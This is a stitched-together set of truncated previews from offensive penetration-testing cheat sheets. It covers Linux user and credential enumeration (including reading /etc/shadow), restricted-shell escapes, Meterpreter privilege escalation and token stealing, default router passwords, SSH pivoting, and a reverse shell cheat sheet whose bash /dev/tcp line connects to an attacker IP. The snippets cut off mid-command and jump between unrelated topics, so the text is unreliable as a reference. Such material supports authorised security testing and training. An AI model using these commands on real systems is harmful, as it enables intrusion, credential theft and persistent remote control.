Users & Groups:

| Command | Result |
| --- | --- |
| `cat /etc/passwd` | List all users on the system |
| `cat /etc/group` | List all groups on the system |
| `for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null` | List all uid’s and respective group memberships |
| `cat /etc/shadow` | Show user hashes – Privileged comma... |
Table of Contents
Information
Blind Files
System
Networking
User accounts
Credentials
Configs
Determine Distro
Installed Packages
Package Sources
Finding Important Files
Covering Your Tracks
Avoiding history filesmys
Obtain users’ information
Escalating
Looking for possible opened paths
Maintaining control
Reverse Shell
Fun if ...
Spawning shell/break restricted shell
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh -i
echo os.system('/bin/bash')
(From within vi)
:!bash
Add all binary paths if PATH variable is lacking
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Set up webserver
python -m ...
DNS Enumeration:

| Command | Result |
| --- | --- |
| `dig <domain_name>` | Perform a basic forward lookup |
| `nslookup <domain_name>` | As above |
| `host <domain_name>` | As above |
| `dig @<server> <domain_name>` | Use a specific name server to perform the query |
| `nslookup <domain_name> <server>` | As above |
| `dig @<server> version.bind chaos tx...` | |
John the Ripper is a favourite password cracking tool of many pentesters. There is plenty of documentation about its command line options.
I’ve encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general.
Sometimes I stumb...
<h2>Information Gathering</h2>
getuid
getpid
getprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets
<h2>Escalating Privs</h2>
ps then migrate
getsystem
Tokens (use incognito)
list_tokens -u
impersonate_token
steal_token ...
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port...
Router Pentesting
=================
Database
Web Applications
Desktops
Servers
Web Sites
Routers
Three Different Types of scenario
=================================
1. People purchase routers and do not change the interface's credentials
Default Username
Default Passwords
admin:password
...
<h1>Reverse Shell Cheat Sheet</h1>
<i>Forked from: Published February 5, 2012 | By phillips321</i>
Step one – Set up your listener.
nc -l -v attackerip 4444
In all these examples the attacker IP will be 192.168.0.100
Bash
exec 5<>/dev/tcp/192.168.0.100/4444
cat <&5 | while read line; do $lin...
SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features.
NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples.
SOCKS Proxy
Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot thr...